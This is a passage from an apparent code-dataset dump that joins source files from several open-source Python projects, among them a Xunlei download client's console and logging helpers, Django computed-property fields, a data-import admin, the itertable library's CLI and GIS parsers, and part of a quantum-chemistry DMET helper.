reverse = 0
elif 30 <= style <= 37:
# set foreground color
fg_color = style - 30
elif style == 39:
# default text color
fg_color = 7
fg_bright = 0
elif 40 <= style <= 47:
# set background color
bg_color = style - 40
elif style == 49:
# default background color
bg_color = 0
elif 90 <= style <= 97:
# set bold foreground color
fg_bright = 1
fg_color = style - 90
elif 100 <= style <= 107:
# set bold background color
bg_bright = 1
bg_color = style - 100
elif style == 'bold':
fg_bright = 1
elif style in colors:
fg_color = colors[style]
if fg_color != -1:
attributes &= ~ 0b111
attributes |= fg_color
if fg_bright != -1:
attributes &= ~ 0b1000
attributes |= fg_bright << 3
if bg_color != -1:
attributes &= ~ 0b1110000
attributes |= bg_color << 4
if bg_bright != -1:
attributes &= ~ 0b10000000
attributes |= bg_bright << 7
if reverse != -1:
attributes &= ~ COMMON_LVB_REVERSE_VIDEO
attributes |= reverse << 14
# XXX: COMMON_LVB_REVERSE_VIDEO doesn't work...
if reverse:
attributes = (attributes & ~(0b11111111 | COMMON_LVB_REVERSE_VIDEO)) | ((attributes & 0b11110000) >> 4) | ((attributes & 0b1111) << 4)
if underscore != -1:
attributes &= ~ COMMON_LVB_UNDERSCORE
attributes |= underscore << 15
return attributes
class Render:
def __init__(self, handle, default, attributes):
self.handle = handle
self.default = default
self.attributes = attributes
def __enter__(self):
SetConsoleTextAttribute(self.handle, self.attributes)
def __exit__(self, type, value, traceback):
SetConsoleTextAttribute(self.handle, self.default)
class WinConsole(Console):
def __init__(self, output=None, styles=[], handle=STD_OUTPUT_HANDLE):
Console.__init__(self, output, styles)
self.handle = GetStdHandle(handle)
self.default = GetConsoleScreenBufferInfo(self.handle).wAttributes
def write(self, s):
if self.styles:
with self.render(mix_styles(self.styles, self.default)):
self.output.write(s)
self.output.flush()
else:
self.output.write(s)
self.output.flush()
def render(self, attributes):
return Render(self.handle, self.default, attributes)
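# Usage sketch (assumption: the Console base class in lixian_colors_console
# falls back to sys.stdout when output is None; this example is not part of
# the original module):
#   console = WinConsole(sys.stdout, styles=['red', 'bold'])
#   console.write('download failed\n')
# write() translates the ANSI-style names into Win32 console attributes via
# mix_styles() and Render restores the saved default attributes on exit.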
```
#### File: xunlei-lixian/lixian_commands/util.py
```python
__all__ = ['parse_login', 'parse_colors', 'parse_logging', 'parse_size', 'create_client', 'output_tasks', 'usage']
from lixian_cli_parser import *
from lixian_config import get_config
from lixian_config import LIXIAN_DEFAULT_COOKIES
from lixian_encoding import default_encoding, to_native
from lixian_colors import colors
from getpass import getpass
import lixian_help
@command_line_value('username', default=get_config('username'))
@command_line_value('password', default=get_config('password'))
@command_line_value('cookies', default=LIXIAN_DEFAULT_COOKIES)
def parse_login(args):
if args.password == '-':
args.password = getpass('Password: ')
if args.cookies == '-':
args._args['cookies'] = None
return args
@command_line_option('colors', default=get_config('colors', True))
def parse_colors(args):
pass
@command_line_value('log-level', default=get_config('log-level'))
@command_line_value('log-path', default=get_config('log-path'))
@command_line_option('debug')
@command_line_option('trace')
def parse_logging(args):
path = args.log_path
level = args.log_level
if args.trace:
level = 'trace'
elif args.debug:
level = 'debug'
if path or level:
import lixian_logging
level = level or 'info'
lixian_logging.init_logger(use_colors=args.colors, level=level, path=path)
logger = lixian_logging.get_logger()
import lixian
# inject logger to lixian (this makes lixian.py zero-dependency)
lixian.logger = logger
@command_line_option('size', default=get_config('size'))
@command_line_option('format-size', default=get_config('format-size'))
def parse_size(args):
pass
def create_client(args):
from lixian import XunleiClient
return XunleiClient(args.username, args.password, args.cookies)
def output_tasks(tasks, columns, args, top=True):
for i, t in enumerate(tasks):
status_colors = {
'waiting': 'yellow',
'downloading': 'magenta',
'completed':'green',
'pending':'cyan',
'failed':'red',
}
c = status_colors[t['status_text']]
with colors(args.colors).ansi(c)():
for k in columns:
if k == 'n':
if top:
print '#%d' % t['#'],
elif k == 'id':
print t.get('index', t['id']),
elif k == 'name':
print t['name'].encode(default_encoding),
elif k == 'status':
with colors(args.colors).bold():
print t['status_text'],
elif k == 'size':
if args.format_size:
from lixian_util import format_size
print format_size(t['size']),
else:
print t['size'],
elif k == 'progress':
print t['progress'],
elif k == 'speed':
print t['speed'],
elif k == 'date':
print t['date'],
elif k == 'dcid':
print t['dcid'],
elif k == 'gcid':
print t['gcid'],
elif k == 'original-url':
print t['original_url'],
elif k == 'download-url':
print t['xunlei_url'],
else:
raise NotImplementedError(k)
print
def usage(doc=lixian_help.usage, message=None):
if hasattr(doc, '__call__'):
doc = doc()
if message:
print to_native(message)
print to_native(doc).strip()
```
#### File: 1py/xunlei-lixian/lixian_logging.py
```python
__all__ = ['init_logger', 'get_logger']
import logging
INFO = logging.INFO
DEBUG = logging.DEBUG
TRACE = 1
def file_logger(path, level):
import os.path
path = os.path.expanduser(path)
logger = logging.getLogger('lixian')
logger.setLevel(min(level, DEBUG)) # if file log is enabled, always log debug message
handler = logging.FileHandler(filename=path, )
handler.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
logger.addHandler(handler)
return logger
class ConsoleLogger:
def __init__(self, level=INFO):
self.level = level
def stdout(self, message):
print message
def info(self, message):
if self.level <= INFO:
print message
def debug(self, message):
if self.level <= DEBUG:
print message
def trace(self, message):
pass
class FileLogger:
def __init__(self, path, level=INFO, file_level=None, console_level=None):
console_level = console_level or level
file_level = file_level or level
self.console = ConsoleLogger(console_level)
self.logger = file_logger(path, file_level)
def stdout(self, message):
self.console.stdout(message)
def info(self, message):
self.console.info(message)
self.logger.info(message)
def debug(self, message):
self.console.debug(message)
self.logger.debug(message)
def trace(self, message):
self.logger.log(level=TRACE, msg=message)
default_logger = None
def init_logger(use_colors=True, level=INFO, path=None):
global default_logger
if not default_logger:
if isinstance(level, int):
assert level in (INFO, DEBUG, TRACE)
console_level = level
file_level = level
elif isinstance(level, basestring):
level = level.lower()
if level in ('info', 'debug', 'trace'):
level = {'info': INFO, 'debug': DEBUG, 'trace': TRACE}[level]
console_level = level
file_level = level
else:
console_level = INFO
file_level = DEBUG
for level in level.split(','):
device, level = level.split(':')
if device == 'console':
console_level = {'info': INFO, 'debug': DEBUG, 'trace': TRACE}[level]
elif device == 'file':
file_level = {'info': INFO, 'debug': DEBUG, 'trace': TRACE}[level]
else:
raise NotImplementedError('Invalid logging level: ' + device)
else:
raise NotImplementedError(type(level))
if path:
default_logger = FileLogger(path, console_level=console_level, file_level=file_level)
else:
default_logger = ConsoleLogger(console_level)
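# Illustrative note (example values are assumptions, not from the original file):
# level may also be a combined per-device string such as 'console:info,file:debug',
# which the parsing above turns into console_level=INFO and file_level=DEBUG, e.g.
#   init_logger(level='console:info,file:debug', path='~/.lixian.log')
# logs INFO and above to the console while the file also records DEBUG messages.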
def get_logger():
init_logger()
return default_logger
```
#### File: lixian_plugins/commands/extend_links.py
```python
from lixian_plugins.api import command
@command(usage='parse links')
def extend_links(args):
'''
usage: lx extend-links http://kuai.xunlei.com/d/... http://www.verycd.com/topics/...
parse and print links from pages
lx extend-links urls...
lx extend-links --name urls...
'''
from lixian_cli_parser import parse_command_line
from lixian_encoding import default_encoding
args = parse_command_line(args, [], ['name'])
import lixian_plugins.parsers
if args.name:
for x in lixian_plugins.parsers.extend_links_name(args):
print x.encode(default_encoding)
else:
for x in lixian_plugins.parsers.extend_links(args):
print x
```
#### File: lixian_plugins/commands/hash.py
```python
from lixian_plugins.api import command
@command(name='hash', usage='compute hashes')
def print_hash(args):
'''
lx hash --sha1 file...
lx hash --md5 file...
lx hash --md4 file...
lx hash --dcid file...
lx hash --ed2k file...
lx hash --info-hash xxx.torrent...
lx hash --verify-sha1 file hash
lx hash --verify-md5 file hash
lx hash --verify-md4 file hash
lx hash --verify-dcid file hash
lx hash --verify-ed2k file ed2k://...
lx hash --verify-bt file xxx.torrent
'''
#assert len(args) == 1
import lixian_hash
#import lixian_hash_ed2k
#print 'ed2k:', lixian_hash_ed2k.hash_file(args[0])
#print 'dcid:', lixian_hash.dcid_hash_file(args[0])
import lixian_cli_parser
lixian_hash.main(lixian_cli_parser.expand_command_line(args))
```
#### File: lixian_plugins/filters/date.py
```python
from lixian_plugins.api import task_filter
@task_filter(pattern=r'^\d{4}[-.]\d{2}[-.]\d{2}$')
def filter_by_date(keyword, task):
return task['date'] == keyword.replace('-', '.')
```
#### File: lixian_plugins/filters/sort.py
```python
from lixian_plugins.api import task_filter
@task_filter(protocol='sort', batch=True)
def sort_by_name(keyword, tasks):
'''
Example:
lx list sort:
lx download 0/sort:/[0-1]
'''
return sorted(tasks, key=lambda x: x['name'])
``` |
{
"source": "1py/youku-lixian",
"score": 2
} |
#### File: 1py/youku-lixian/qq.py
```python
__all__ = ['qq_download_by_id']
import re
from common import *
def qq_download_by_id(id, title, merge=True):
url = 'http://vsrc.store.qq.com/%s.flv' % id
assert title
download_urls([url], title, 'flv', total_size=None, merge=merge)
``` |
{
"source": "1Q1-Open-Source/django-computed-property",
"score": 2
} |
#### File: django-computed-property/computed_property/fields.py
```python
from __future__ import print_function
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.signals import pre_save
__all__ = [
'ComputedBooleanField',
'ComputedCharField',
'ComputedDateField',
'ComputedDateTimeField',
'ComputedDecimalField',
'ComputedEmailField',
'ComputedField',
'ComputedFloatField',
'ComputedIntegerField',
'ComputedPositiveIntegerField',
'ComputedPositiveSmallIntegerField',
'ComputedSmallIntegerField',
'ComputedTextField',
'ComputedTimeField',
]
class ComputedField(models.Field):
def __init__(self, compute_from=None, *args, **kwargs):
kwargs['editable'] = False
if compute_from is None:
raise ImproperlyConfigured(
'%s requires setting compute_from' %
self.__class__.__name__
)
super(ComputedField, self).__init__(*args, **kwargs)
self.compute_from = compute_from
class ObjectProxy(object):
def __init__(self, field):
self.field = field
def __get__(self, instance, cls=None):
if instance is None:
return self
value = self.field.calculate_value(instance)
instance.__dict__[self.field.name] = value
return value
def __set__(self, obj, value):
pass
def contribute_to_class(self, cls, name, **kwargs):
"""Add field to class using ObjectProxy so that
calculate_value can access the model instance."""
self.set_attributes_from_name(name)
cls._meta.add_field(self)
self.model = cls
setattr(cls, name, ComputedField.ObjectProxy(self))
pre_save.connect(self.resolve_computed_field, sender=cls)
def resolve_computed_field(self, sender, instance, raw, **kwargs):
"""Pre-save signal receiver to compute new field value."""
setattr(instance, self.get_attname(), self.calculate_value(instance))
return self.calculate_value(instance)
def calculate_value(self, instance):
"""
Retrieve or call function to obtain value for this field.
Args:
instance: Parent model instance to reference
"""
if callable(self.compute_from):
value = self.compute_from(instance)
else:
instance_compute_object = getattr(instance, self.compute_from)
if callable(instance_compute_object):
value = instance_compute_object()
else:
value = instance_compute_object
return self.to_python(value)
def deconstruct(self):
name, path, args, kwargs = super(ComputedField, self).deconstruct()
kwargs['compute_from'] = self.compute_from
return name, path, args, kwargs
def to_python(self, value):
return super(ComputedField, self).to_python(value)
def get_prep_value(self, value):
return super(ComputedField, self).get_prep_value(value)
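# Illustrative note (field and method names below are hypothetical, not from the
# original module): calculate_value() accepts compute_from in three forms -- a
# callable taking the instance, the name of a model method, or the name of an
# attribute/property -- so the following declarations behave the same way:
#   full_name = ComputedCharField(max_length=50, compute_from=lambda self: self.first + ' ' + self.last)
#   full_name = ComputedCharField(max_length=50, compute_from='build_full_name')     # method name
#   full_name = ComputedCharField(max_length=50, compute_from='full_name_property')  # attribute/property name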
class ComputedBooleanField(ComputedField, models.BooleanField):
pass
class ComputedCharField(ComputedField, models.CharField):
pass
class ComputedDateField(ComputedField, models.DateField):
pass
class ComputedDateTimeField(ComputedField, models.DateTimeField):
pass
class ComputedDecimalField(ComputedField, models.DecimalField):
pass
class ComputedEmailField(ComputedField, models.EmailField):
pass
class ComputedFloatField(ComputedField, models.FloatField):
pass
class ComputedIntegerField(ComputedField, models.IntegerField):
pass
class ComputedPositiveIntegerField(ComputedField, models.PositiveIntegerField):
pass
class ComputedPositiveSmallIntegerField(ComputedField,
models.PositiveSmallIntegerField):
pass
class ComputedSmallIntegerField(ComputedField, models.SmallIntegerField):
pass
class ComputedTextField(ComputedField, models.TextField):
pass
class ComputedTimeField(ComputedField, models.TimeField):
pass
```
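A minimal usage sketch for the fields above (hypothetical `Invoice` model inside an installed Django app; as `calculate_value` shows, `compute_from` may name a method or property, or be a callable):
```python
# Hypothetical example, not part of the package: a model using ComputedCharField.
# The value is recomputed in the pre_save signal, so it stays current on save().
from django.db import models
import computed_property
class Invoice(models.Model):
    amount_cents = models.IntegerField(default=0)
    display_amount = computed_property.ComputedCharField(
        max_length=32,
        compute_from='format_amount',  # attribute name; a callable also works
    )
    def format_amount(self):
        return '$%.2f' % (self.amount_cents / 100.0)
```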
#### File: computed_property/tests/models.py
```python
import datetime
from decimal import Decimal
from django.db import models
import computed_property as fields
def always_true(_): # Needs to consume an arg
return True
class ComputedBool(models.Model):
computed = fields.ComputedBooleanField(compute_from=always_true)
base_value = models.BooleanField(default=False)
class ComputedChar(models.Model):
computed = fields.ComputedCharField(
max_length=25,
compute_from=lambda self: 'char has %s' % self.base_value
)
base_value = models.CharField(
max_length=25,
default='foo'
)
class ComputedDate(models.Model):
computed = fields.ComputedDateField(
compute_from='base_value'
)
base_value = models.DateField()
class ComputedDateFromDateTime(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
computed = fields.ComputedDateField(
compute_from='created_at'
)
class ComputedDateTime(models.Model):
computed = fields.ComputedDateTimeField(
compute_from=lambda self: self.base_value + datetime.timedelta(days=1)
)
base_value = models.DateTimeField()
class ComputedDecimal(models.Model):
computed = fields.ComputedDecimalField(compute_from='convert_to_decimal',
max_digits=3,
decimal_places=2)
base_value = models.IntegerField(default=100)
def convert_to_decimal(self):
return Decimal(self.base_value) / Decimal('100.0')
class ComputedEmail(models.Model):
computed = fields.ComputedEmailField(
compute_from='prepend_test_to_email'
)
base_value = models.EmailField(
max_length=25,
default='<EMAIL>'
)
def prepend_test_to_email(self):
return 'test%s' % self.base_value
class ComputedFloat(models.Model):
computed = fields.ComputedFloatField(compute_from='convert_to_float')
base_value = models.IntegerField(default=100)
def convert_to_float(self):
return float(self.base_value / 100.0)
class AbstractInt(models.Model):
base_value = models.IntegerField(
default=123
)
@property
def compute_val(self):
return self.base_value + 1000
class Meta:
abstract = True
class ComputedInt(AbstractInt):
computed = fields.ComputedIntegerField(
compute_from='compute_val'
)
class ComputedNullable(models.Model):
computed = fields.ComputedIntegerField(
null=True,
compute_from=lambda x: None
)
class ComputedPositiveInt(AbstractInt):
computed = fields.ComputedPositiveIntegerField(compute_from='compute_val')
class ComputedPositiveSmallInt(AbstractInt):
computed = fields.ComputedPositiveSmallIntegerField(
compute_from='compute_val'
)
class ComputedSmallInt(AbstractInt):
computed = fields.ComputedSmallIntegerField(compute_from='compute_val')
class ComputedText(models.Model):
computed = fields.ComputedTextField(
compute_from=lambda x: 'char has %s' % x.base_value
)
base_value = models.CharField(
max_length=25,
default='foo'
)
class ComputedTime(models.Model):
computed = fields.ComputedTimeField(compute_from='base_value')
base_value = models.DateTimeField()
``` |
{
"source": "1Q1-Open-Source/django-data-wizard",
"score": 2
} |
#### File: django-data-wizard/data_wizard/admin.py
```python
from django.contrib import admin
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from .models import Run, RunLog, Identifier, Range, Record
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
class FixedTabularInline(admin.TabularInline):
can_delete = False
extra = 0
def has_add_permission(self, request, obj):
return False
class RangeInline(admin.TabularInline):
model = Range
fields = [
"identifier",
"type",
"header_col",
"start_col",
"end_col",
"header_row",
"start_row",
"end_row",
"count",
]
extra = 0
class RecordInline(FixedTabularInline):
model = Record
fields = readonly_fields = [
"row",
"success",
"content_type",
"content_object",
"fail_reason",
]
class RunLogInline(FixedTabularInline):
model = RunLog
readonly_fields = ["event", "date"]
@admin.register(Run)
class RunAdmin(admin.ModelAdmin):
list_display = [
"__str__",
"serializer_label",
"record_count",
"last_update",
]
inlines = [RangeInline, RecordInline, RunLogInline]
@admin.register(Identifier)
class IdentifierAdmin(admin.ModelAdmin):
list_display = [
"serializer_label",
"type_label",
"name",
"mapping_label",
"resolved",
]
list_display_links = ["name", "mapping_label"]
list_filter = ["serializer"]
def start_data_wizard(modeladmin, request, queryset):
if queryset.count() != 1:
modeladmin.message_user(
request,
"Select a single row to start data wizard.",
level=messages.ERROR,
)
return
instance = queryset.first()
if isinstance(instance, Run):
run = instance
else:
ct = ContentType.objects.get_for_model(queryset.model)
run = Run.objects.create(
user=request.user,
content_type=ct,
object_id=instance.pk,
)
return HttpResponseRedirect(
reverse("data_wizard:run-serializers", kwargs={"pk": run.pk})
)
start_data_wizard.short_description = _("Import via data wizard")
class ImportActionMixin(object):
"""
Mixin with import functionality implemented as an admin action.
"""
actions = [start_data_wizard]
class ImportActionModelAdmin(ImportActionMixin, admin.ModelAdmin):
pass
``` |
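Exposing the wizard for an existing model then takes a one-line registration with the mixin above. A small sketch (hypothetical `Observation` model; assumes data_wizard is installed and its URLs are mounted under the `data_wizard` namespace, which the `reverse('data_wizard:run-serializers', ...)` call relies on):
```python
# Hypothetical example, not part of the package.
from django.contrib import admin
from data_wizard.admin import ImportActionModelAdmin
from myapp.models import Observation  # hypothetical model
@admin.register(Observation)
class ObservationAdmin(ImportActionModelAdmin):
    list_display = ["name", "created"]  # hypothetical fields
```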
{
"source": "1Q1-Open-Source/itertable",
"score": 3
} |
#### File: itertable/itertable/commands.py
```python
from . import load_file, load_url, flattened, JsonStringIter, CsvStringIter
from .exceptions import IterException
import click
import os
import importlib
@click.command()
@click.argument('source')
@click.argument('source_options', required=False)
@click.option('--format', '-f', default='csv', help='Output format')
def cat(source, source_options, format):
"""
Display contents of a file or IterTable class. SOURCE can be either a
filename or a Python path. SOURCE_OPTIONS is an optional string
specifying init options in "name=value" format, separated by commas.
The data will be printed to the terminal in CSV form, unless the format is
set to JSON.
Examples:
\b
python3 -m itertable example.json # JSON to CSV
python3 -m itertable -f json example.csv # CSV to JSON
python3 -m itertable example.xlsx "start_row=5"
python3 -m itertable http://example.com/example.csv
python3 -m itertable itertable.CsvNetIter "url=http://example.com/example.csv"
""" # noqa
# Parse option string
options = {}
if source_options:
for opt in source_options.split(','):
key, val = opt.split('=')
if val.isdigit():
val = int(val)
options[key] = val
if os.path.exists(source):
try:
input = load_file(source, options=options)
except IterException as e:
raise click.ClickException(str(e))
elif 'http' in source and '://' in source:
try:
input = load_url(source, options=options)
except IterException as e:
raise click.ClickException(str(e))
else:
parts = source.split('.')
class_name = parts[-1]
module_name = ".".join(parts[:-1])
try:
module = importlib.import_module(module_name)
Iter = getattr(module, class_name)
input = flattened(Iter, **options)
except (ImportError, ValueError, AttributeError, IterException) as e:
raise click.ClickException(str(e))
if format == "json":
OutputIter = JsonStringIter
init = "[]"
else:
OutputIter = CsvStringIter
init = ""
output = OutputIter(data=input.data, string=init)
output.data = input.data
output.save()
result = output.string
if output.binary:
result = result.decode('utf-8')
print(result)
```
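Since `cat` is a plain Click command, it can also be exercised programmatically via Click's test runner, which is convenient for tests. A short sketch (assumes an `example.csv` exists in the working directory):
```python
# Hypothetical usage sketch; uses only click's public testing API.
from click.testing import CliRunner
from itertable.commands import cat
runner = CliRunner()
result = runner.invoke(cat, ["example.csv", "--format", "json"])
print(result.exit_code)  # 0 on success
print(result.output)     # the CSV contents re-serialized as JSON
```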
#### File: itertable/gis/__init__.py
```python
from .mixins import FionaLoaderParser, GisMapper, ShapeMapper, WktMapper
from ..base import BaseIter
class MetaSyncIter(BaseIter):
"""
    Custom sync() to handle transferring Fiona metadata (except for driver)

"""
def sync(self, other, save=True):
driver = other.meta.get('driver', None)
other.meta = self.meta.copy()
if driver:
other.meta['driver'] = driver
super(MetaSyncIter, self).sync(other, save)
def get_field_names(self):
if self.field_names is None and self.meta is not None:
return (
['id', 'geometry']
+ list(self.meta['schema']['properties'].keys())
)
return super(MetaSyncIter, self).get_field_names()
class GisIter(FionaLoaderParser, GisMapper, MetaSyncIter):
pass
class ShapeIter(FionaLoaderParser, ShapeMapper, MetaSyncIter):
pass
class WktIter(FionaLoaderParser, WktMapper, MetaSyncIter):
pass
```
#### File: itertable/gis/mixins.py
```python
import fiona
from shapely import wkt, geometry
from ..loaders import FileLoader
from ..parsers.base import BaseParser
from ..mappers import TupleMapper
class FionaLoaderParser(FileLoader, BaseParser):
"""
Composite loader & parser mixin for GIS data, powered by Fiona
"""
layer_id = None
meta = {}
key_field = 'id'
def load(self):
try:
self.layers = fiona.listlayers(self.filename)
except (ValueError, IOError):
driver = guess_driver(self.filename)
self.meta = {'driver': driver}
self.empty_file = True
def parse(self):
# If multiple layers, parse all of them (!)
if len(self.layers) > 1 and self.layer_id is None:
cls = type(self)
self.data = [{
'id': id,
'name': name,
'data': cls(filename=self.filename, layer_id=id)
} for id, name in enumerate(self.layers)]
else:
# One layer, load & parse GIS data
with fiona.open(self.filename, layer=self.layer_id) as f:
self.meta = f.meta
if 'id' in f.meta.get('schema', {}).get('properties', {}):
# TODO: Is this correct?
del f.meta['schema']['properties']['id']
self.data = list(map(self.parse_feature, f))
def parse_feature(self, f):
# Flatten Fiona's GeoJSON-style representation into something more
# amenable to namedtuple-ing
feat = {key: value for key, value in f['properties'].items()}
if 'id' not in feat and 'ID' not in feat:
feat['id'] = f['id']
feat['geometry'] = f['geometry']
return feat
def dump_feature(self, feat, i):
# Undo aforementioned flattening
return {
'id': feat.get('id', feat.get('ID', i)),
'geometry': feat['geometry'],
'properties': {
key: value for key, value in feat.items()
if key not in ('geometry', 'id',)
}
}
def dump(self):
# Dump and save the dataset at the same time via Fiona
pass
def save(self):
with fiona.open(self.filename, 'w', **self.meta) as f:
for i, feat in enumerate(self.data):
f.write(self.dump_feature(feat, i))
class GisMapper(TupleMapper):
"""
GIS-aware tuple mapper
"""
def as_dataframe(self):
# Mimic BaseIter.as_dataframe() but with GeoDataFrame
# (also, key_field is always set)
from geopandas import GeoDataFrame
key = self.get_key_field()
data = [self.item_dict(row) for row in self.values()]
df = GeoDataFrame(data)
df.set_index(key, inplace=True)
return df
def item_dict(self, uitem):
# Turn usable item into GeoDataFrame-friendly dict
data = uitem._asdict()
data['geometry'] = geometry.shape(data['geometry'])
return data
class ShapeMapper(GisMapper):
"""
Map Fiona's GeoJSON-style geometries to and from Shapely shapes
"""
def map_value(self, field, value):
value = super(ShapeMapper, self).map_value(field, value)
if field == 'geometry':
value = geometry.shape(value)
return value
def unmap_value(self, field, value):
if field == 'geometry':
value = geometry.mapping(value)
return super(ShapeMapper, self).unmap_value(field, value)
def item_dict(self, uitem):
return uitem._asdict()
class WktMapper(ShapeMapper):
"""
Map geometries to and from WKT (good for Django integration)
"""
def map_value(self, field, value):
value = super(WktMapper, self).map_value(field, value)
if field == 'geometry':
value = wkt.dumps(value)
return value
def unmap_value(self, field, value):
if field == 'geometry':
value = wkt.loads(value)
return super(WktMapper, self).unmap_value(field, value)
def item_dict(self, uitem):
data = uitem._asdict()
data['geometry'] = wkt.loads(data['geometry'])
return data
def guess_driver(filename):
if filename.endswith(".shp"):
return "ESRI Shapefile"
else:
return "GeoJSON"
```
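The mapper chain above moves between three geometry representations: Fiona's GeoJSON-style dicts, Shapely shapes (`ShapeMapper`), and WKT strings (`WktMapper`). A minimal sketch of the two conversions it relies on (uses only shapely; exact WKT formatting depends on the shapely version):
```python
# Illustration of the conversions used by ShapeMapper and WktMapper above.
from shapely import wkt, geometry
geojson_geom = {"type": "Point", "coordinates": [30.0, 10.0]}
shape = geometry.shape(geojson_geom)       # GeoJSON-style dict -> Shapely shape
print(shape.wkt)                           # e.g. POINT (30 10)
print(wkt.loads(shape.wkt).equals(shape))  # True: WKT round-trips the geometry
```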
#### File: itertable/parsers/readers.py
```python
try:
import unicodecsv as csv
UNICODE_CSV = True
except ImportError:
import csv
UNICODE_CSV = False
if issubclass(csv.DictReader, object):
# Python 3
DictReader = csv.DictReader
else:
# Python 2
class DictReader(object, csv.DictReader):
pass
class SkipPreludeReader(DictReader):
"""
A specialized version of DictReader that attempts to find where the "real"
CSV data is in a file that may contain a prelude of non-CSV text.
"""
max_header_row = 20
def __init__(self, f, fieldnames=None, restkey=None, restval=None,
dialect="excel", *args, **kwds):
# Preserve file since we're going to start reading it
self._file = f
# Preserve reader options since we'll need to make another one
readeropts = [f, dialect]
readeropts.extend(args)
self._readeropts = (readeropts, kwds)
csv.DictReader.__init__(self, f, fieldnames, restkey, restval,
dialect, *args, **kwds)
@property
def fieldnames(self):
if self._fieldnames is not None:
return self._fieldnames
# Create a new reader just to figure out which row is the header
args, kwds = self._readeropts
data = csv.reader(*args, **kwds)
rows = []
for i in range(self.max_header_row):
try:
rows.append(next(data))
except StopIteration:
pass
header_row, field_names = self.choose_header(rows)
# Reset file and advance reader so it starts in the right spot
self._file.seek(0)
for i in range(header_row + 1):
try:
next(self.reader)
except StopIteration:
pass
self._fieldnames = field_names
self._header_row = header_row
return field_names
@property
def header_row(self):
self.fieldnames # used for side effect
return self._header_row
def choose_header(self, rows):
"""
Determine which row contains column headers from the provided set.
Default is to assume that the first longest row is the header.
"""
header_row = 0
field_names = []
# Select header from available rows
for i, row in enumerate(rows):
if len(row) > len(field_names):
header_row = i
field_names = row
return header_row, field_names
```
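`choose_header` treats the first longest row (within the first `max_header_row` rows) as the header, so banner or prelude lines before the real CSV data are skipped. A small self-contained sketch (synthetic in-memory CSV; assumes the stdlib `csv` fallback, i.e. text-mode input):
```python
# Hypothetical illustration of SkipPreludeReader skipping a non-CSV prelude line.
import io
from itertable.parsers.readers import SkipPreludeReader
text = io.StringIO(
    "Exported by ACME Sensor Suite\n"
    "site,temp,humidity\n"
    "A,21.5,40\n"
    "B,19.0,55\n"
)
reader = SkipPreludeReader(text)
print(reader.fieldnames)   # ['site', 'temp', 'humidity']
for row in reader:
    print(row["site"], row["temp"])  # A 21.5 / B 19.0
```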
#### File: itertable/tests/base.py
```python
from os.path import join, dirname
from os import unlink
import unittest
class IoTestCase(unittest.TestCase):
data = [{
'one': 1,
'two': 2,
'three': 3,
}, {
'one': 4,
'two': 5,
'three': 6,
}]
def get_filename(self, filename, ext, remove_existing=False):
filename = join(dirname(__file__), "files", "%s.%s" % (filename, ext))
if remove_existing:
try:
unlink(filename)
except OSError:
pass
return filename
def check_instance(self, instance):
self.assertEqual(len(instance), len(self.data))
for row, data in zip(instance, self.data):
for key in data:
val = getattr(row, key)
try:
val = int(float(val))
except ValueError:
pass
self.assertEqual(val, data[key])
```
#### File: itertable/tests/test_custom.py
```python
from itertable import JsonFileIter, XmlFileIter
from itertable.exceptions import MappingFailed
from .base import IoTestCase
class CustomJsonFileIter(JsonFileIter):
namespace = "data.items"
class ExtraJsonFileIter(CustomJsonFileIter):
scan_fields = True
class CustomXmlFileIter(XmlFileIter):
root_tag = "items"
item_tag = "item"
class CustomTestCase(IoTestCase):
def test_custom_json(self):
filename = self.get_filename("custom", "json")
instance = CustomJsonFileIter(filename=filename)
self.check_instance(instance)
def test_scan_fields(self):
filename = self.get_filename("custom2", "json")
instance = ExtraJsonFileIter(filename=filename)
self.check_instance(instance)
self.assertIn("four", instance.get_field_names())
self.assertIsNone(instance[0].four)
self.assertEqual(instance[1].four, "extra")
def test_unexpected_field(self):
filename = self.get_filename("custom2", "json")
instance = CustomJsonFileIter(filename=filename)
# Extra field in non-first row breaks namedtuple
with self.assertRaises(MappingFailed) as e:
instance[1]
self.assertIn("unexpected field", str(e.exception))
def test_custom_xml(self):
filename = self.get_filename("custom", "xml")
instance = CustomXmlFileIter(filename=filename)
self.check_instance(instance)
```
#### File: itertable/tests/test_gis_dataframe.py
```python
from itertable.gis import GisIter, WktIter, ShapeIter
from .base import IoTestCase
class GisDataFrameTestCase(IoTestCase):
def test_gisio_dataframe(self):
self.dataframe_test(GisIter)
def test_wktio_dataframe(self):
self.dataframe_test(WktIter)
def test_shapeio_dataframe(self):
self.dataframe_test(ShapeIter)
def dataframe_test(self, cls):
instance = cls(filename="tests/files/test.shp")
df = instance.as_dataframe()
self.assertEqual(len(df), 2)
self.assertGreater(df.geometry.area.sum(), 0)
``` |
{
"source": "1QB-Information-Technologies/openqemist",
"score": 2
} |
#### File: dmet/_helpers/dmet_bath.py
```python
import numpy as np
def dmet_fragment_bath(mol, t_list, temp_list, onerdm_low):
""" Construct the bath orbitals for DMET fragment calculation.
Args:
mol (pyscf.gto.Mole): The molecule to simulate (The full molecular system).
t_list (list): Number of [0] fragment & [1] bath orbitals (int).
temp_list (list): [0] Minimum and [1] maximum number for the active orbitals (int).
onerdm_low (numpy.array): One-particle RDM from the low-level calculation (float64).
Returns:
bath_orb (numpy.array): The bath orbitals (float64).
e_core (numpy.array): Orbital energies (float64).
"""
# Extract the one-particle RDM for the active space
onerdm_embedded = dmet_onerdm_embed(mol, temp_list, onerdm_low)
# Diagonalize it
e, c = np.linalg.eigh(onerdm_embedded)
# Sort the eigenvectors with the eigenvalues
e_sorted, c_sorted = dmet_bath_orb_sort(t_list, e, c)
# Add the core contribution
bath_orb, e_core = dmet_add_to_bath_orb(mol, t_list, temp_list, e_sorted, c_sorted)
return bath_orb, e_core
def dmet_onerdm_embed(mol, temp_list, onerdm_before):
""" Extract the one particle RDM of the active space.
Args:
mol (pyscf.gto.Mole): The molecule to simulate (The full molecular system).
temp_list (list): [0] Minimum and [1] maximum number for the active orbitals (int).
onerdm_before (numpy.array): One-particle RDM from the low-level calculation (float64).
Returns:
onerdm_temp3 (numpy.array): Extracted one-particle RDM (float64).
"""
# Get the number of orbitals
norbital_total = mol.nao_nr()
# Reshape the RDM
onerdm_matrix = np.reshape(onerdm_before, (norbital_total, norbital_total))
if temp_list[0] == 0:
# If it is the first fragment, just determine the maximum for extraction
onerdm_temp = onerdm_matrix[ : , temp_list[1]: ]
